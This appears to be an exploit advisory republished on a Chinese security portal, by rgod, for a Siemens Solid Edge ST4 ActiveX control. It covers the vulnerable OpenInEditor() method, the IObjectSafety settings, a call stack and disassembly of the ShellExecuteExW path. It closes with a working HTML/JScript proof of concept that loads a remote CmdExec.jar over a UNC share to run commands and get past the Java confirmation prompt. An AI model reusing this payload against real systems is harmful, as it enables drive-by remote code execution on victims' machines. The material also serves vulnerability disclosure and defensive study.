首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 SIEMENS Solid Edge ST4 WebPartHelper ActiveX - RFMSsvs!JShellExecuteEx RCE 来源：vfocus.net 作者：rgod 发布时间：2013-05-27   SIEMENS Solid Edge ST4 WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx Remote Command Execution Tested against: Microsoft Windows Server 2003 r2 sp2                 Microsoft Windows XP sp3                 Internet Explorer 8 Software description: http://en.wikipedia.org/wiki/Solid_Edge vendor site: http://www.siemens.com/entry/cc/en/ Download url: http://www.plm.automation.siemens.com/en_us/products/velocity/forms/solid-edge-student.cfm File tested: SolidEdgeV104ENGLISH_32Bit.exe Background: The mentioned software installs an ActiveX control with the following settings: CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522} Progid: SolidEdge.WebPartHelper.1 Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll Implements IObjectSafety: True Safe For Initialization (IObjectSafety): False Safe For Scripting (IObjectSafety): True This control *implements* IObjectSafety: IE will query through the IObjectSafety interface for "Safe for Initialization with data" and "Safe For Scripting". According to IObjectSafety interface, this control is Safe for Scripting then IE  will allow scripting of this control according to browser security settings. vulnerability: the WebPartHelper Class offers the OpenInEditor() method, see typelib: ...   /* DISPID=8 */ function OpenInEditor(         /* VT_VARIANT [12] [in] */ $URL         ) { } ... By passing an null session share path to the URL argument of this method is possible to launch an arbitrary executable. This is because of a ShellExecuteExW() call inside RFMSsvs.dll Call stack when ShellExecuteExW() is called: Address    Stack      Procedure / arguments                 Called from                   Frame 01B7E140   04AC9F0E   SHELL32.ShellExecuteExW               RFMSsvs.04AC9F08              01B7F280 01B7F284   022B71AD   ? <jmp.&RFMSsvs.JShellExecuteEx>      WPHelper.022B71A8             01B7F280 01B7F560   022B85B6   WPHelper.022B6D70                     WPHelper.022B85B1             01B7F55C 01B7F5D4   022B87A5   ? WPHelper.022B8380                   WPHelper.022B87A0             01B7F5D0 01B7F620   022B89CB   WPHelper.022B8710                     WPHelper.022B89C6             01B7F61C 01B7F668   7D0E5186   Includes WPHelper.022B89CB            OLEAUT32.7D0E5184             01B7F664 01B7F690   7D0F4ACF   ? OLEAUT32.DispCallFunc               OLEAUT32.7D0F4ACA             01B7F68C 01B7F720   022B58C3   Includes OLEAUT32.7D0F4ACF            WPHelper.022B58C1             01B7F71C 01B7F748   40302C02   Includes WPHelper.022B58C3            jscript.40302BFF              01B7F744 01B7F784   40302B6F   jscript.40302B90                      jscript.40302B6A              01B7F780 01B7F7C0   40302AFA   jscript.40302B2E                      jscript.40302AF5              01B7F7BC 01B7F834   40303555   ? jscript.40302A88                    jscript.40303550              01B7F830 01B7F878   40301221   jscript.4030122A                      jscript.4030121C              01B7F874 01B7F8B8   403011D6   jscript.403011E1                      jscript.403011D1              01B7F8B4 01B7F8DC   4030312D   jscript.40301182                      jscript.40303128              01B7F8D8 WPHelper.dll: ... 022B718A   899D 74FDFFFF    mov dword ptr ss:[ebp-28C],ebx 022B7190   8D85 D8FDFFFF    lea eax,dword ptr ss:[ebp-228] 022B7196   50               push eax 022B7197   8D8D 60FDFFFF    lea ecx,dword ptr ss:[ebp-2A0] 022B719D   51               push ecx 022B719E   C785 7CFDFFFF 01>mov dword ptr ss:[ebp-284],1 022B71A8   E8 ADBB0100      call <jmp.&RFMSsvs.JShellExecuteEx> ... RFMSsvs.dll: ... 04AC9ECF   8B85 A4EFFFFF    mov eax,dword ptr ss:[ebp-105C] 04AC9ED5   8D8D 4CEFFFFF    lea ecx,dword ptr ss:[ebp-10B4] 04AC9EDB   8946 24          mov dword ptr ds:[esi+24],eax 04AC9EDE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ 04AC9EE4   8946 10          mov dword ptr ds:[esi+10],eax 04AC9EE7   C645 FC 02       mov byte ptr ss:[ebp-4],2 04AC9EEB   8D8D D8EEFFFF    lea ecx,dword ptr ss:[ebp-1128] 04AC9EF1   E8 6A89F1FF      call RFMSsvs.??1JrfmsFileName@@QAE@XZ 04AC9EF6   EB 0F            jmp short RFMSsvs.04AC9F07 04AC9EF8   8D8D 84EFFFFF    lea ecx,dword ptr ss:[ebp-107C] 04AC9EFE   FF15 0CE3CB04    call dword ptr ds:[<&JUtil.??BGUserText@@QBEPB_WXZ>]                    ; JUtil.??BGUserText@@QBEPB_WXZ 04AC9F04   8946 10          mov dword ptr ds:[esi+10],eax        ; eax -> "\\192.168.2.100\uncshare\CmdExec.jar" 04AC9F07   56               push esi 04AC9F08   FF15 E8E6CB04    call dword ptr ds:[<&SHELL32.ShellExecuteExW>]                          ; SHELL32.ShellExecuteExW ... As attachment, proof of concept code. Note that by pointing OpenInEditor() (and consequently ShellExecuteExW() ) to a remote .jar file as handled in JRE/JDK7u21 is possible to bypass the usual confirmation box. <!-- SIEMENS Solid Edge WebPartHelper ActiveX Control RFMSsvs!JShellExecuteEx Remote Command Execution PoC CLSID: {DD568718-FF20-48EA-973F-0BD5C9FCA522} Progid: SolidEdge.WebPartHelper.1 Binary Path: C:\Program Files\Solid Edge ST4\Program\WPHelper.dll Implements IObjectSafety: True Safe For Initialization (IObjectSafety): False Safe For Scripting (IObjectSafety): True --> <!-- saved from url=(0014)about:internet --> <html> <script>   var obj = new ActiveXObject("SolidEdge.WebPartHelper.1");       //launch calc.exe   //obj.OpenInEditor("c:\\windows\\system32\\calc.exe");   //bypass the confirmation box, JRE/JDK7u21   obj.OpenInEditor("\\\\192.168.0.1\\uncshare\\CmdExec.jar"); </script>   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Show In Browser 0.0.3 Ruby Gem ·SIEMENS Solid Edge ST4 SEListC ·SAS Integration Technologies C ·CompatUI ActiveX Control <= Re ·Nginx HTTP Server 1.3.9-1.4.0 ·HP LaserJet Pro P1606dn Passwo ·AdobeCollabSync Buffer Overflo ·CodeBlocks 12.11 (Mac OS X) - ·Analysis of nginx 1.3.9/1.4.0 ·IBM SPSS SamplePower C1Tab Act ·Logic Print 2013 - Stack Overf ·win32k!EPATHOBJ::pprFlattenRec   推荐广告

CopyRight © 2002-2025 VFocuS.Net All Rights Reserved